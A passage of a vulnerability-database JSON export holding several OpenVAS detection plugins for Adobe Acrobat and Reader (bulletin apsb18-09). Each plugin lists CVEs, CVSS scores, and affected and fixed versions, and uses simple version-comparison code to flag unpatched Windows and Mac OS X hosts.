\"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:36 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Reader 2017 Security Updates(apsb18-09)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader 2017\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat Reader 2017 prior to version\n 2017.011.30080 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat Reader 2017 version\n 2017.011.30080 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30079\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2017.011.30080\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:17:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813238", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813238", "type": "openvas", "title": "Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09) - Windows", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_dc_classic\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813238\");\n script_version(\"2019-07-05T08:21:18+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:21:18 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:55 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09) - Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat DC (Classic Track)\n 2015.006.30418 and earlier versions on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat DC (Classic Track)\n version 2015.006.30418 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_dc_classic_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/AcrobatDC/Classic/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"15.006.30418\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"15.006.30418 (2015.006.30418)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:17:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Acrobat 2017\n and is prone to multiple vulnerabilities.", "modified": "2019-07-16T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813232", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813232", "type": "openvas", "title": "Adobe Acrobat 2017 Security Updates(apsb18-09)-MAC OS X", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat 2017 Security Updates(apsb18-09)-MAC OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813232\");\n script_version(\"2019-07-16T10:51:36+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-16 10:51:36 +0000 (Tue, 16 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:36 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Acrobat 2017 Security Updates(apsb18-09)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat 2017\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat 2017 before 2017.011.30080 on\n MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat 2017 version\n 2017.011.30080 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30079\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"17.011.30080 (2017.011.30080)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:18:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Reader 2017\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813233", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813233", "type": "openvas", "title": "Adobe Reader 2017 Security Updates(apsb18-09)-MAC OS X", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Reader 2017 Security Updates(apsb18-09)-MAC OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813233\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:36 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Reader 2017 Security Updates(apsb18-09)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader 2017\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat Reader 2017 prior to version\n 2017.011.30080 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat Reader 2017 version\n 2017.011.30080 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Reader/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30079\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2017.011.30080\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:18:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4946", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Reader DC\n (Classic Track) and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813241", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813241", "type": "openvas", "title": "Adobe Reader DC (Classic Track) Security Updates (apsb18-09) - Mac OS X", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Reader DC (Classic Track) Security Updates (apsb18-09)-MAC OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader_dc_classic\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813241\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4946\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:55 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Reader DC (Classic Track) Security Updates (apsb18-09) - Mac OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader DC\n (Classic Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader DC (Classic Track)\n 2015.006.30418 and earlier on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader DC (Classic Track) version\n 2015.006.30418 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_reader_dc_classic_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/ReaderDC/Classic/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"15.0\", test_version2:\"15.006.30417\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"15.006.30418 (2015.006.30418)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:18:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4946", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Reader DC\n (Classic Track) and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813240", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813240", "type": "openvas", "title": "Adobe Reader DC (Classic Track) Security Updates (apsb18-09) - Windows", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Reader DC (Classic Track) Security Updates (apsb18-09)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 